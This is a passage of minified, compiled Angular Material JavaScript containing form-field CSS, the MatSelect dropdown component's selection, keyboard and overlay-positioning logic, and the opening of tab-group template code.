.mat-form-field-ripple{height:1px}",".mat-form-field-appearance-outline .mat-form-field-wrapper{margin:.25em 0}.mat-form-field-appearance-outline .mat-form-field-flex{padding:0 .75em 0 .75em;margin-top:-0.25em;position:relative}.mat-form-field-appearance-outline .mat-form-field-prefix,.mat-form-field-appearance-outline .mat-form-field-suffix{top:.25em}.mat-form-field-appearance-outline .mat-form-field-outline{display:flex;position:absolute;top:.25em;left:0;right:0;bottom:0;pointer-events:none}.mat-form-field-appearance-outline .mat-form-field-outline-start,.mat-form-field-appearance-outline .mat-form-field-outline-end{border:1px solid currentColor;min-width:5px}.mat-form-field-appearance-outline .mat-form-field-outline-start{border-radius:5px 0 0 5px;border-right-style:none}[dir=rtl] .mat-form-field-appearance-outline .mat-form-field-outline-start{border-right-style:solid;border-left-style:none;border-radius:0 5px 5px 0}.mat-form-field-appearance-outline .mat-form-field-outline-end{border-radius:0 5px 5px 0;border-left-style:none;flex-grow:1}[dir=rtl] .mat-form-field-appearance-outline .mat-form-field-outline-end{border-left-style:solid;border-right-style:none;border-radius:5px 0 0 5px}.mat-form-field-appearance-outline .mat-form-field-outline-gap{border-radius:.000001px;border:1px solid currentColor;border-left-style:none;border-right-style:none}.mat-form-field-appearance-outline.mat-form-field-can-float.mat-form-field-should-float .mat-form-field-outline-gap{border-top-color:rgba(0,0,0,0)}.mat-form-field-appearance-outline .mat-form-field-outline-thick{opacity:0}.mat-form-field-appearance-outline .mat-form-field-outline-thick .mat-form-field-outline-start,.mat-form-field-appearance-outline .mat-form-field-outline-thick .mat-form-field-outline-end,.mat-form-field-appearance-outline .mat-form-field-outline-thick .mat-form-field-outline-gap{border-width:2px}.mat-form-field-appearance-outline.mat-focused .mat-form-field-outline,.mat-form-field-appearance-outline.mat-form-field-invalid .mat-form-field-outline{opacity:0;transition:opacity 100ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-form-field-appearance-outline.mat-focused .mat-form-field-outline-thick,.mat-form-field-appearance-outline.mat-form-field-invalid .mat-form-field-outline-thick{opacity:1}.cdk-high-contrast-active .mat-form-field-appearance-outline.mat-focused .mat-form-field-outline-thick{border:3px dashed}.mat-form-field-appearance-outline:not(.mat-form-field-disabled) .mat-form-field-flex:hover .mat-form-field-outline{opacity:0;transition:opacity 600ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-form-field-appearance-outline:not(.mat-form-field-disabled) .mat-form-field-flex:hover .mat-form-field-outline-thick{opacity:1}.mat-form-field-appearance-outline .mat-form-field-subscript-wrapper{padding:0 1em}.cdk-high-contrast-active .mat-form-field-appearance-outline.mat-form-field-disabled .mat-form-field-outline{color:GrayText}.mat-form-field-appearance-outline._mat-animation-noopable:not(.mat-form-field-disabled) .mat-form-field-flex:hover~.mat-form-field-outline,.mat-form-field-appearance-outline._mat-animation-noopable .mat-form-field-outline,.mat-form-field-appearance-outline._mat-animation-noopable .mat-form-field-outline-start,.mat-form-field-appearance-outline._mat-animation-noopable .mat-form-field-outline-end,.mat-form-field-appearance-outline._mat-animation-noopable .mat-form-field-outline-gap{transition:none}",".mat-form-field-appearance-standard .mat-form-field-flex{padding-top:.75em}.mat-form-field-appearance-standard .mat-form-field-underline{height:1px}.cdk-high-contrast-active .mat-form-field-appearance-standard .mat-form-field-underline{height:0;border-top:solid 1px}.mat-form-field-appearance-standard .mat-form-field-ripple{bottom:0;height:2px}.cdk-high-contrast-active .mat-form-field-appearance-standard .mat-form-field-ripple{height:0;border-top:solid 2px}.mat-form-field-appearance-standard.mat-form-field-disabled .mat-form-field-underline{background-position:0;background-color:rgba(0,0,0,0)}.cdk-high-contrast-active .mat-form-field-appearance-standard.mat-form-field-disabled .mat-form-field-underline{border-top-style:dotted;border-top-width:2px}.mat-form-field-appearance-standard:not(.mat-form-field-disabled) .mat-form-field-flex:hover~.mat-form-field-underline .mat-form-field-ripple{opacity:1;transform:none;transition:opacity 600ms cubic-bezier(0.25, 0.8, 0.25, 1)}.mat-form-field-appearance-standard._mat-animation-noopable:not(.mat-form-field-disabled) .mat-form-field-flex:hover~.mat-form-field-underline .mat-form-field-ripple{transition:none}"],encapsulation:2,data:{animation:[Ege.transitionMessages]},changeDetection:0}),t})(),r8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,la,$y,la]}),t})();const Sge=["trigger"],kge=["panel"];function Pge(t,a){if(1&t&&(m(0,"span",8),s(1),u()),2&t){const e=B();C(1),ke(e.placeholder)}}function Oge(t,a){if(1&t&&(m(0,"span",12),s(1),u()),2&t){const e=B(2);C(1),ke(e.triggerValue)}}function Nge(t,a){1&t&&va(0,0,["*ngSwitchCase","true"])}function Lge(t,a){1&t&&(m(0,"span",9),ne(1,Oge,2,1,"span",10),ne(2,Nge,1,0,"ng-content",11),u()),2&t&&(V("ngSwitch",!!B().customTrigger),C(2),V("ngSwitchCase",!0))}function zge(t,a){if(1&t){const e=Ye();m(0,"div",13)(1,"div",14,15),he("@transformPanel.done",function(n){return be(e),Me(B()._panelDoneAnimatingStream.next(n.toState))})("keydown",function(n){return be(e),Me(B()._handleKeydown(n))}),va(3,1),u()()}if(2&t){const e=B();V("@transformPanelWrap",void 0),C(1),Dv("mat-select-panel ",e._getPanelTheme(),""),ri("transform-origin",e._transformOrigin)("font-size",e._triggerFontSize,"px"),V("ngClass",e.panelClass)("@transformPanel",e.multiple?"showing-multiple":"showing"),Rt("id",e.id+"-panel")("aria-multiselectable",e.multiple)("aria-label",e.ariaLabel||null)("aria-labelledby",e._getPanelAriaLabelledby())}}const Wge=[[["mat-select-trigger"]],"*"],Fge=["mat-select-trigger","*"],pF={transformPanelWrap:nr("transformPanelWrap",[gn("* => void",c4("@transformPanel",[s4()],{optional:!0}))]),transformPanel:nr("transformPanel",[sn("void",zi({transform:"scaleY(0.8)",minWidth:"100%",opacity:0})),sn("showing",zi({opacity:1,minWidth:"calc(100% + 32px)",transform:"scaleY(1)"})),sn("showing-multiple",zi({opacity:1,minWidth:"calc(100% + 64px)",transform:"scaleY(1)"})),gn("void => *",En("120ms cubic-bezier(0, 0, 0.2, 1)")),gn("* => void",En("100ms 25ms linear",zi({opacity:0})))])};let _F=0;const CF=new ni("mat-select-scroll-strategy"),Uge=new ni("MAT_SELECT_CONFIG"),qge={provide:CF,deps:[As],useFactory:function Hge(t){return()=>t.scrollStrategies.reposition()}};class Gge{constructor(a,e){this.source=a,this.value=e}}const jge=El(dp(Zc(Uw(class{constructor(t,a,e,i,n){this._elementRef=t,this._defaultErrorStateMatcher=a,this._parentForm=e,this._parentFormGroup=i,this.ngControl=n,this.stateChanges=new J}})))),yF=new ni("MatSelectTrigger");let Qge=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-select-trigger"]],features:[ki([{provide:yF,useExisting:t}])]}),t})(),$ge=(()=>{class t extends jge{constructor(e,i,n,r,c,d,T,k,q,Y,te,pe,Re,Fe){var Ne,et,ut;super(c,r,T,k,Y),this._viewportRuler=e,this._changeDetectorRef=i,this._ngZone=n,this._dir=d,this._parentFormField=q,this._liveAnnouncer=Re,this._defaultOptions=Fe,this._panelOpen=!1,this._compareWith=(Ze,yt)=>Ze===yt,this._uid="mat-select-"+_F++,this._triggerAriaLabelledBy=null,this._destroy=new J,this._onChange=()=>{},this._onTouched=()=>{},this._valueId="mat-select-value-"+_F++,this._panelDoneAnimatingStream=new J,this._overlayPanelClass=(null===(Ne=this._defaultOptions)||void 0===Ne?void 0:Ne.overlayPanelClass)||"",this._focused=!1,this.controlType="mat-select",this._multiple=!1,this._disableOptionCentering=null!==(ut=null===(et=this._defaultOptions)||void 0===et?void 0:et.disableOptionCentering)&&void 0!==ut&&ut,this.ariaLabel="",this.optionSelectionChanges=rp(()=>{const Ze=this.options;return Ze?Ze.changes.pipe(Ro(Ze),Ur(()=>ra(...Ze.map(yt=>yt.onSelectionChange)))):this._ngZone.onStable.pipe(Cn(1),Ur(()=>this.optionSelectionChanges))}),this.openedChange=new Tt,this._openedStream=this.openedChange.pipe(Dn(Ze=>Ze),Xe(()=>{})),this._closedStream=this.openedChange.pipe(Dn(Ze=>!Ze),Xe(()=>{})),this.selectionChange=new Tt,this.valueChange=new Tt,this.ngControl&&(this.ngControl.valueAccessor=this),null!=(null==Fe?void 0:Fe.typeaheadDebounceInterval)&&(this._typeaheadDebounceInterval=Fe.typeaheadDebounceInterval),this._scrollStrategyFactory=pe,this._scrollStrategy=this._scrollStrategyFactory(),this.tabIndex=parseInt(te)||0,this.id=this.id}get focused(){return this._focused||this._panelOpen}get placeholder(){return this._placeholder}set placeholder(e){this._placeholder=e,this.stateChanges.next()}get required(){var e,i,n,r;return null!==(r=null!==(e=this._required)&&void 0!==e?e:null===(n=null===(i=this.ngControl)||void 0===i?void 0:i.control)||void 0===n?void 0:n.hasValidator(Td.required))&&void 0!==r&&r}set required(e){this._required=wi(e),this.stateChanges.next()}get multiple(){return this._multiple}set multiple(e){this._multiple=wi(e)}get disableOptionCentering(){return this._disableOptionCentering}set disableOptionCentering(e){this._disableOptionCentering=wi(e)}get compareWith(){return this._compareWith}set compareWith(e){this._compareWith=e,this._selectionModel&&this._initializeSelection()}get value(){return this._value}set value(e){this._assignValue(e)&&this._onChange(e)}get typeaheadDebounceInterval(){return this._typeaheadDebounceInterval}set typeaheadDebounceInterval(e){this._typeaheadDebounceInterval=Uo(e)}get id(){return this._id}set id(e){this._id=e||this._uid,this.stateChanges.next()}ngOnInit(){this._selectionModel=new I1(this.multiple),this.stateChanges.next(),this._panelDoneAnimatingStream.pipe(Bh(),ea(this._destroy)).subscribe(()=>this._panelDoneAnimating(this.panelOpen))}ngAfterContentInit(){this._initKeyManager(),this._selectionModel.changed.pipe(ea(this._destroy)).subscribe(e=>{e.added.forEach(i=>i.select()),e.removed.forEach(i=>i.deselect())}),this.options.changes.pipe(Ro(null),ea(this._destroy)).subscribe(()=>{this._resetOptions(),this._initializeSelection()})}ngDoCheck(){const e=this._getTriggerAriaLabelledby(),i=this.ngControl;if(e!==this._triggerAriaLabelledBy){const n=this._elementRef.nativeElement;this._triggerAriaLabelledBy=e,e?n.setAttribute("aria-labelledby",e):n.removeAttribute("aria-labelledby")}i&&(this._previousControl!==i.control&&(void 0!==this._previousControl&&null!==i.disabled&&i.disabled!==this.disabled&&(this.disabled=i.disabled),this._previousControl=i.control),this.updateErrorState())}ngOnChanges(e){(e.disabled||e.userAriaDescribedBy)&&this.stateChanges.next(),e.typeaheadDebounceInterval&&this._keyManager&&this._keyManager.withTypeAhead(this._typeaheadDebounceInterval)}ngOnDestroy(){this._destroy.next(),this._destroy.complete(),this.stateChanges.complete()}toggle(){this.panelOpen?this.close():this.open()}open(){this._canOpen()&&(this._panelOpen=!0,this._keyManager.withHorizontalOrientation(null),this._highlightCorrectOption(),this._changeDetectorRef.markForCheck())}close(){this._panelOpen&&(this._panelOpen=!1,this._keyManager.withHorizontalOrientation(this._isRtl()?"rtl":"ltr"),this._changeDetectorRef.markForCheck(),this._onTouched())}writeValue(e){this._assignValue(e)}registerOnChange(e){this._onChange=e}registerOnTouched(e){this._onTouched=e}setDisabledState(e){this.disabled=e,this._changeDetectorRef.markForCheck(),this.stateChanges.next()}get panelOpen(){return this._panelOpen}get selected(){var e,i;return this.multiple?(null===(e=this._selectionModel)||void 0===e?void 0:e.selected)||[]:null===(i=this._selectionModel)||void 0===i?void 0:i.selected[0]}get triggerValue(){if(this.empty)return"";if(this._multiple){const e=this._selectionModel.selected.map(i=>i.viewValue);return this._isRtl()&&e.reverse(),e.join(", ")}return this._selectionModel.selected[0].viewValue}_isRtl(){return!!this._dir&&"rtl"===this._dir.value}_handleKeydown(e){this.disabled||(this.panelOpen?this._handleOpenKeydown(e):this._handleClosedKeydown(e))}_handleClosedKeydown(e){const i=e.keyCode,n=40===i||38===i||37===i||39===i,r=13===i||32===i,c=this._keyManager;if(!c.isTyping()&&r&&!es(e)||(this.multiple||e.altKey)&&n)e.preventDefault(),this.open();else if(!this.multiple){const d=this.selected;c.onKeydown(e);const T=this.selected;T&&d!==T&&this._liveAnnouncer.announce(T.viewValue,1e4)}}_handleOpenKeydown(e){const i=this._keyManager,n=e.keyCode,r=40===n||38===n,c=i.isTyping();if(r&&e.altKey)e.preventDefault(),this.close();else if(c||13!==n&&32!==n||!i.activeItem||es(e))if(!c&&this._multiple&&65===n&&e.ctrlKey){e.preventDefault();const d=this.options.some(T=>!T.disabled&&!T.selected);this.options.forEach(T=>{T.disabled||(d?T.select():T.deselect())})}else{const d=i.activeItemIndex;i.onKeydown(e),this._multiple&&r&&e.shiftKey&&i.activeItem&&i.activeItemIndex!==d&&i.activeItem._selectViaInteraction()}else e.preventDefault(),i.activeItem._selectViaInteraction()}_onFocus(){this.disabled||(this._focused=!0,this.stateChanges.next())}_onBlur(){this._focused=!1,!this.disabled&&!this.panelOpen&&(this._onTouched(),this._changeDetectorRef.markForCheck(),this.stateChanges.next())}_onAttached(){this._overlayDir.positionChange.pipe(Cn(1)).subscribe(()=>{this._changeDetectorRef.detectChanges(),this._positioningSettled()})}_getPanelTheme(){return this._parentFormField?`mat-${this._parentFormField.color}`:""}get empty(){return!this._selectionModel||this._selectionModel.isEmpty()}_initializeSelection(){Promise.resolve().then(()=>{this.ngControl&&(this._value=this.ngControl.value),this._setSelectionByValue(this._value),this.stateChanges.next()})}_setSelectionByValue(e){if(this._selectionModel.selected.forEach(i=>i.setInactiveStyles()),this._selectionModel.clear(),this.multiple&&e)Array.isArray(e),e.forEach(i=>this._selectOptionByValue(i)),this._sortValues();else{const i=this._selectOptionByValue(e);i?this._keyManager.updateActiveItem(i):this.panelOpen||this._keyManager.updateActiveItem(-1)}this._changeDetectorRef.markForCheck()}_selectOptionByValue(e){const i=this.options.find(n=>{if(this._selectionModel.isSelected(n))return!1;try{return null!=n.value&&this._compareWith(n.value,e)}catch(r){return!1}});return i&&this._selectionModel.select(i),i}_assignValue(e){return!!(e!==this._value||this._multiple&&Array.isArray(e))&&(this.options&&this._setSelectionByValue(e),this._value=e,!0)}_initKeyManager(){this._keyManager=new Bz(this.options).withTypeAhead(this._typeaheadDebounceInterval).withVerticalOrientation().withHorizontalOrientation(this._isRtl()?"rtl":"ltr").withHomeAndEnd().withAllowedModifierKeys(["shiftKey"]),this._keyManager.tabOut.pipe(ea(this._destroy)).subscribe(()=>{this.panelOpen&&(!this.multiple&&this._keyManager.activeItem&&this._keyManager.activeItem._selectViaInteraction(),this.focus(),this.close())}),this._keyManager.change.pipe(ea(this._destroy)).subscribe(()=>{this._panelOpen&&this.panel?this._scrollOptionIntoView(this._keyManager.activeItemIndex||0):!this._panelOpen&&!this.multiple&&this._keyManager.activeItem&&this._keyManager.activeItem._selectViaInteraction()})}_resetOptions(){const e=ra(this.options.changes,this._destroy);this.optionSelectionChanges.pipe(ea(e)).subscribe(i=>{this._onSelect(i.source,i.isUserInput),i.isUserInput&&!this.multiple&&this._panelOpen&&(this.close(),this.focus())}),ra(...this.options.map(i=>i._stateChanges)).pipe(ea(e)).subscribe(()=>{this._changeDetectorRef.markForCheck(),this.stateChanges.next()})}_onSelect(e,i){const n=this._selectionModel.isSelected(e);null!=e.value||this._multiple?(n!==e.selected&&(e.selected?this._selectionModel.select(e):this._selectionModel.deselect(e)),i&&this._keyManager.setActiveItem(e),this.multiple&&(this._sortValues(),i&&this.focus())):(e.deselect(),this._selectionModel.clear(),null!=this.value&&this._propagateChanges(e.value)),n!==this._selectionModel.isSelected(e)&&this._propagateChanges(),this.stateChanges.next()}_sortValues(){if(this.multiple){const e=this.options.toArray();this._selectionModel.sort((i,n)=>this.sortComparator?this.sortComparator(i,n,e):e.indexOf(i)-e.indexOf(n)),this.stateChanges.next()}}_propagateChanges(e){let i=null;i=this.multiple?this.selected.map(n=>n.value):this.selected?this.selected.value:e,this._value=i,this.valueChange.emit(i),this._onChange(i),this.selectionChange.emit(this._getChangeEvent(i)),this._changeDetectorRef.markForCheck()}_highlightCorrectOption(){this._keyManager&&(this.empty?this._keyManager.setFirstItemActive():this._keyManager.setActiveItem(this._selectionModel.selected[0]))}_canOpen(){var e;return!this._panelOpen&&!this.disabled&&(null===(e=this.options)||void 0===e?void 0:e.length)>0}focus(e){this._elementRef.nativeElement.focus(e)}_getPanelAriaLabelledby(){var e;if(this.ariaLabel)return null;const i=null===(e=this._parentFormField)||void 0===e?void 0:e.getLabelId();return this.ariaLabelledby?(i?i+" ":"")+this.ariaLabelledby:i}_getAriaActiveDescendant(){return this.panelOpen&&this._keyManager&&this._keyManager.activeItem?this._keyManager.activeItem.id:null}_getTriggerAriaLabelledby(){var e;if(this.ariaLabel)return null;const i=null===(e=this._parentFormField)||void 0===e?void 0:e.getLabelId();let n=(i?i+" ":"")+this._valueId;return this.ariaLabelledby&&(n+=" "+this.ariaLabelledby),n}_panelDoneAnimating(e){this.openedChange.emit(e)}setDescribedByIds(e){e.length?this._elementRef.nativeElement.setAttribute("aria-describedby",e.join(" ")):this._elementRef.nativeElement.removeAttribute("aria-describedby")}onContainerClick(){this.focus(),this.open()}get shouldLabelFloat(){return this._panelOpen||!this.empty||this._focused&&!!this._placeholder}}return t.\u0275fac=function(e){return new(e||t)(Ee(bm),Ee(Ma),Ee(qi),Ee(mp),Ee(mi),Ee(Cr,8),Ee(y1,8),Ee(lg,8),Ee(cb,8),Ee(fm,10),Vr("tabindex"),Ee(CF),Ee(Nw),Ee(Uge,8))},t.\u0275dir=Ot({type:t,viewQuery:function(e,i){if(1&e&&(Mi(Sge,5),Mi(kge,5),Mi(i8,5)),2&e){let n;Vt(n=Bt())&&(i.trigger=n.first),Vt(n=Bt())&&(i.panel=n.first),Vt(n=Bt())&&(i._overlayDir=n.first)}},inputs:{userAriaDescribedBy:["aria-describedby","userAriaDescribedBy"],panelClass:"panelClass",placeholder:"placeholder",required:"required",multiple:"multiple",disableOptionCentering:"disableOptionCentering",compareWith:"compareWith",value:"value",ariaLabel:["aria-label","ariaLabel"],ariaLabelledby:["aria-labelledby","ariaLabelledby"],errorStateMatcher:"errorStateMatcher",typeaheadDebounceInterval:"typeaheadDebounceInterval",sortComparator:"sortComparator",id:"id"},outputs:{openedChange:"openedChange",_openedStream:"opened",_closedStream:"closed",selectionChange:"selectionChange",valueChange:"valueChange"},features:[ci,sa]}),t})(),Nr=(()=>{class t extends $ge{constructor(){super(...arguments),this._scrollTop=0,this._triggerFontSize=0,this._transformOrigin="top",this._offsetY=0,this._positions=[{originX:"start",originY:"top",overlayX:"start",overlayY:"top"},{originX:"start",originY:"bottom",overlayX:"start",overlayY:"bottom"}]}_calculateOverlayScroll(e,i,n){const r=this._getItemHeight();return Math.min(Math.max(0,r*e-i+r/2),n)}ngOnInit(){super.ngOnInit(),this._viewportRuler.change().pipe(ea(this._destroy)).subscribe(()=>{this.panelOpen&&(this._triggerRect=this.trigger.nativeElement.getBoundingClientRect(),this._changeDetectorRef.markForCheck())})}open(){super._canOpen()&&(super.open(),this._triggerRect=this.trigger.nativeElement.getBoundingClientRect(),this._triggerFontSize=parseInt(getComputedStyle(this.trigger.nativeElement).fontSize||"0"),this._calculateOverlayPosition(),this._ngZone.onStable.pipe(Cn(1)).subscribe(()=>{this._triggerFontSize&&this._overlayDir.overlayRef&&this._overlayDir.overlayRef.overlayElement&&(this._overlayDir.overlayRef.overlayElement.style.fontSize=`${this._triggerFontSize}px`)}))}_scrollOptionIntoView(e){const i=$w(e,this.options,this.optionGroups),n=this._getItemHeight();this.panel.nativeElement.scrollTop=0===e&&1===i?0:RW((e+i)*n,n,this.panel.nativeElement.scrollTop,256)}_positioningSettled(){this._calculateOverlayOffsetX(),this.panel.nativeElement.scrollTop=this._scrollTop}_panelDoneAnimating(e){this.panelOpen?this._scrollTop=0:(this._overlayDir.offsetX=0,this._changeDetectorRef.markForCheck()),super._panelDoneAnimating(e)}_getChangeEvent(e){return new Gge(this,e)}_calculateOverlayOffsetX(){const e=this._overlayDir.overlayRef.overlayElement.getBoundingClientRect(),i=this._viewportRuler.getViewportSize(),n=this._isRtl(),r=this.multiple?56:32;let c;if(this.multiple)c=40;else if(this.disableOptionCentering)c=16;else{let k=this._selectionModel.selected[0]||this.options.first;c=k&&k.group?32:16}n||(c*=-1);const d=0-(e.left+c-(n?r:0)),T=e.right+c-i.width+(n?0:r);d>0?c+=d+8:T>0&&(c-=T+8),this._overlayDir.offsetX=Math.round(c),this._overlayDir.overlayRef.updatePosition()}_calculateOverlayOffsetY(e,i,n){const r=this._getItemHeight(),c=(r-this._triggerRect.height)/2,d=Math.floor(256/r);let T;return this.disableOptionCentering?0:(T=0===this._scrollTop?e*r:this._scrollTop===n?(e-(this._getItemCount()-d))*r+(r-(this._getItemCount()*r-256)%r):i-r/2,Math.round(-1*T-c))}_checkOverlayWithinViewport(e){const i=this._getItemHeight(),n=this._viewportRuler.getViewportSize(),r=this._triggerRect.top-8,c=n.height-this._triggerRect.bottom-8,d=Math.abs(this._offsetY),k=Math.min(this._getItemCount()*i,256)-d-this._triggerRect.height;k>c?this._adjustPanelUp(k,c):d>r?this._adjustPanelDown(d,r,e):this._transformOrigin=this._getOriginBasedOnOption()}_adjustPanelUp(e,i){const n=Math.round(e-i);this._scrollTop-=n,this._offsetY-=n,this._transformOrigin=this._getOriginBasedOnOption(),this._scrollTop<=0&&(this._scrollTop=0,this._offsetY=0,this._transformOrigin="50% bottom 0px")}_adjustPanelDown(e,i,n){const r=Math.round(e-i);if(this._scrollTop+=r,this._offsetY+=r,this._transformOrigin=this._getOriginBasedOnOption(),this._scrollTop>=n)return this._scrollTop=n,this._offsetY=0,void(this._transformOrigin="50% top 0px")}_calculateOverlayPosition(){const e=this._getItemHeight(),i=this._getItemCount(),n=Math.min(i*e,256),c=i*e-n;let d;d=this.empty?0:Math.max(this.options.toArray().indexOf(this._selectionModel.selected[0]),0),d+=$w(d,this.options,this.optionGroups);const T=n/2;this._scrollTop=this._calculateOverlayScroll(d,T,c),this._offsetY=this._calculateOverlayOffsetY(d,T,c),this._checkOverlayWithinViewport(c)}_getOriginBasedOnOption(){const e=this._getItemHeight(),i=(e-this._triggerRect.height)/2;return`50% ${Math.abs(this._offsetY)-i+e/2}px 0px`}_getItemHeight(){return 3*this._triggerFontSize}_getItemCount(){return this.options.length+this.optionGroups.length}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["mat-select"]],contentQueries:function(e,i,n){if(1&e&&(fa(n,yF,5),fa(n,yr,5),fa(n,j3,5)),2&e){let r;Vt(r=Bt())&&(i.customTrigger=r.first),Vt(r=Bt())&&(i.options=r),Vt(r=Bt())&&(i.optionGroups=r)}},hostAttrs:["role","combobox","aria-autocomplete","none","aria-haspopup","true",1,"mat-select"],hostVars:19,hostBindings:function(e,i){1&e&&he("keydown",function(r){return i._handleKeydown(r)})("focus",function(){return i._onFocus()})("blur",function(){return i._onBlur()}),2&e&&(Rt("id",i.id)("tabindex",i.tabIndex)("aria-controls",i.panelOpen?i.id+"-panel":null)("aria-expanded",i.panelOpen)("aria-label",i.ariaLabel||null)("aria-required",i.required.toString())("aria-disabled",i.disabled.toString())("aria-invalid",i.errorState)("aria-activedescendant",i._getAriaActiveDescendant()),Ct("mat-select-disabled",i.disabled)("mat-select-invalid",i.errorState)("mat-select-required",i.required)("mat-select-empty",i.empty)("mat-select-multiple",i.multiple))},inputs:{disabled:"disabled",disableRipple:"disableRipple",tabIndex:"tabIndex"},exportAs:["matSelect"],features:[ki([{provide:sb,useExisting:t},{provide:G3,useExisting:t}]),ci],ngContentSelectors:Fge,decls:9,vars:12,consts:[["cdk-overlay-origin","",1,"mat-select-trigger",3,"click"],["origin","cdkOverlayOrigin","trigger",""],[1,"mat-select-value",3,"ngSwitch"],["class","mat-select-placeholder mat-select-min-line",4,"ngSwitchCase"],["class","mat-select-value-text",3,"ngSwitch",4,"ngSwitchCase"],[1,"mat-select-arrow-wrapper"],[1,"mat-select-arrow"],["cdk-connected-overlay","","cdkConnectedOverlayLockPosition","","cdkConnectedOverlayHasBackdrop","","cdkConnectedOverlayBackdropClass","cdk-overlay-transparent-backdrop",3,"cdkConnectedOverlayPanelClass","cdkConnectedOverlayScrollStrategy","cdkConnectedOverlayOrigin","cdkConnectedOverlayOpen","cdkConnectedOverlayPositions","cdkConnectedOverlayMinWidth","cdkConnectedOverlayOffsetY","backdropClick","attach","detach"],[1,"mat-select-placeholder","mat-select-min-line"],[1,"mat-select-value-text",3,"ngSwitch"],["class","mat-select-min-line",4,"ngSwitchDefault"],[4,"ngSwitchCase"],[1,"mat-select-min-line"],[1,"mat-select-panel-wrap"],["role","listbox","tabindex","-1",3,"ngClass","keydown"],["panel",""]],template:function(e,i){if(1&e&&(Jn(Wge),m(0,"div",0,1),he("click",function(){return i.toggle()}),m(3,"div",2),ne(4,Pge,2,1,"span",3),ne(5,Lge,3,2,"span",4),u(),m(6,"div",5),it(7,"div",6),u()(),ne(8,zge,4,14,"ng-template",7),he("backdropClick",function(){return i.close()})("attach",function(){return i._onAttached()})("detach",function(){return i.close()})),2&e){const n=Ti(1);Rt("aria-owns",i.panelOpen?i.id+"-panel":null),C(3),V("ngSwitch",i.empty),Rt("id",i._valueId),C(1),V("ngSwitchCase",!0),C(1),V("ngSwitchCase",!1),C(3),V("cdkConnectedOverlayPanelClass",i._overlayPanelClass)("cdkConnectedOverlayScrollStrategy",i._scrollStrategy)("cdkConnectedOverlayOrigin",n)("cdkConnectedOverlayOpen",i.panelOpen)("cdkConnectedOverlayPositions",i._positions)("cdkConnectedOverlayMinWidth",null==i._triggerRect?null:i._triggerRect.width)("cdkConnectedOverlayOffsetY",i._offsetY)}},dependencies:[ig,Jf,p1,d6,i8,t8],styles:['.mat-select{display:inline-block;width:100%;outline:none}.mat-select-trigger{display:inline-flex;align-items:center;cursor:pointer;position:relative;box-sizing:border-box;width:100%}.mat-select-disabled .mat-select-trigger{-webkit-user-select:none;user-select:none;cursor:default}.mat-select-value{width:100%;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.mat-select-value-text{white-space:nowrap;overflow:hidden;text-overflow:ellipsis}.mat-select-arrow-wrapper{height:16px;flex-shrink:0;display:inline-flex;align-items:center}.mat-form-field-appearance-fill .mat-select-arrow-wrapper{transform:translateY(-50%)}.mat-form-field-appearance-outline .mat-select-arrow-wrapper{transform:translateY(-25%)}.mat-form-field-appearance-standard.mat-form-field-has-label .mat-select:not(.mat-select-empty) .mat-select-arrow-wrapper{transform:translateY(-50%)}.mat-form-field-appearance-standard .mat-select.mat-select-empty .mat-select-arrow-wrapper{transition:transform 400ms cubic-bezier(0.25, 0.8, 0.25, 1)}._mat-animation-noopable.mat-form-field-appearance-standard .mat-select.mat-select-empty .mat-select-arrow-wrapper{transition:none}.mat-select-arrow{width:0;height:0;border-left:5px solid rgba(0,0,0,0);border-right:5px solid rgba(0,0,0,0);border-top:5px solid;margin:0 4px}.mat-form-field.mat-focused .mat-select-arrow{transform:translateX(0)}.mat-select-panel-wrap{flex-basis:100%}.mat-select-panel{min-width:112px;max-width:280px;overflow:auto;-webkit-overflow-scrolling:touch;padding-top:0;padding-bottom:0;max-height:256px;min-width:100%;border-radius:4px;outline:0}.cdk-high-contrast-active .mat-select-panel{outline:solid 1px}.mat-select-panel .mat-optgroup-label,.mat-select-panel .mat-option{font-size:inherit;line-height:3em;height:3em}.mat-form-field-type-mat-select:not(.mat-form-field-disabled) .mat-form-field-flex{cursor:pointer}.mat-form-field-type-mat-select .mat-form-field-label{width:calc(100% - 18px)}.mat-select-placeholder{transition:color 400ms 133.3333333333ms cubic-bezier(0.25, 0.8, 0.25, 1)}._mat-animation-noopable .mat-select-placeholder{transition:none}.mat-form-field-hide-placeholder .mat-select-placeholder{color:rgba(0,0,0,0);-webkit-text-fill-color:rgba(0,0,0,0);transition:none;display:block}.mat-select-min-line:empty::before{content:" ";white-space:pre;width:1px;display:inline-block;visibility:hidden}'],encapsulation:2,data:{animation:[pF.transformPanelWrap,pF.transformPanel]},changeDetection:0}),t})(),s8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[qge],imports:[rn,bu,Q3,la,uu,r8,Q3,la]}),t})();function Kge(t,a){1&t&&va(0)}const bF=["*"];function Xge(t,a){}const Yge=function(t){return{animationDuration:t}},Jge=function(t,a){return{value:t,params:a}},Zge=["tabListContainer"],e0e=["tabList"],t0e=["tabListInner"],i0e=["nextPaginator"],a0e=["previousPaginator"],n0e=["tabBodyWrapper"],o0e=["tabHeader"];function r0e(t,a){}function s0e(t,a){1&t&&ne(0,r0e,0,0,"ng-template",10),2&t&&V("cdkPortalOutlet",B().$implicit.templateLabel)}function c0e(t,a){1&t&&s(0),2&t&&ke(B().$implicit.textLabel)}function l0e(t,a){if(1&t){const e=Ye();m(0,"div",6),he("click",function(){const n=be(e),r=n.$implicit,c=n.index,d=B(),T=Ti(1);return Me(d._handleClick(r,T,c))})("cdkFocusChange",function(n){const c=be(e).index;return Me(B()._tabFocusChanged(n,c))}),m(1,"div",7),ne(2,s0e,1,1,"ng-template",8),ne(3,c0e,1,1,"ng-template",null,9,d1),u()()}if(2&t){const 